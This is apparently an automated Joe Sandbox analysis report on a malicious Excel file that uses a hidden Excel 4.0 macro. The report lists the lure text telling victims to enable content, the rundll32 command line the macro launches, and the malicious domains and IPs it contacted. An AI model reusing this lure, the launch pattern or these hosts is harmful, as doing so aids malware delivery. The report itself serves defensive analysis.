Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 0b31c0f0_by_Libranalysis

Overview

General Information

Sample Name:0b31c0f0_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:412660
MD5:0b31c0f0844b5541f94f915757c4ba61
SHA1:4be1acd410a4e696278657309cd4de7874055991
SHA256:d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2380 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2648 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2552 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2380, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 2648

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 0b31c0f0_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Document image extraction number: 6Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 6Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: CALL
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 0b31c0f0_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 0b31c0f0_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\97DE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDAA.tmpJump to behavior
Source: 0b31c0f0_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 0b31c0f0_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
0b31c0f0_by_Libranalysis.xls5%VirustotalBrowse
0b31c0f0_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com3%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpfalse
    		high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpfalse
      		high
      http://investor.msn.comrundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpfalse
        		high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpfalse
          		high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2110209786.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102675597.0000000001DC7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpfalse
            		high
            http://investor.msn.com/rundll32.exe, 00000002.00000002.2109926962.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2102459413.0000000001BE0000.00000002.00000001.sdmpfalse
              		high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              192.185.39.58
              		signifysystem.comUnited States
              		46606UNIFIEDLAYER-AS-1USfalse
              192.185.32.232
              		fcventasyservicios.clUnited States
              		46606UNIFIEDLAYER-AS-1USfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412660
              Start date:12.05.2021
              Start time:20:51:40
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 18s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:0b31c0f0_by_Libranalysis (renamed file extension from none to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@5/11@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.137.254, 8.241.126.121, 8.253.207.121, 8.241.79.254, 8.238.85.254
              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              192.185.39.58090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                      afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                              32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                        192.185.32.232090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                            54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                    8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                        32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                            9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                              46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  signifysystem.com090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.39.58
                                                                  fcventasyservicios.cl090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  UNIFIEDLAYER-AS-1USSWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                  • 192.185.171.219
                                                                  d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                  • 67.20.76.71
                                                                  statistic-482095214.xlsGet hashmaliciousBrowse
                                                                  • 192.254.186.229
                                                                  statistic-482095214.xlsGet hashmaliciousBrowse
                                                                  • 192.254.186.229
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                  • 192.254.185.244
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 192.232.222.43
                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                  • 67.20.76.71
                                                                  UNIFIEDLAYER-AS-1USSWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                  • 192.185.171.219
                                                                  d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                  • 67.20.76.71
                                                                  statistic-482095214.xlsGet hashmaliciousBrowse
                                                                  • 192.254.186.229
                                                                  statistic-482095214.xlsGet hashmaliciousBrowse
                                                                  • 192.254.186.229
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                  • 192.254.185.244
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
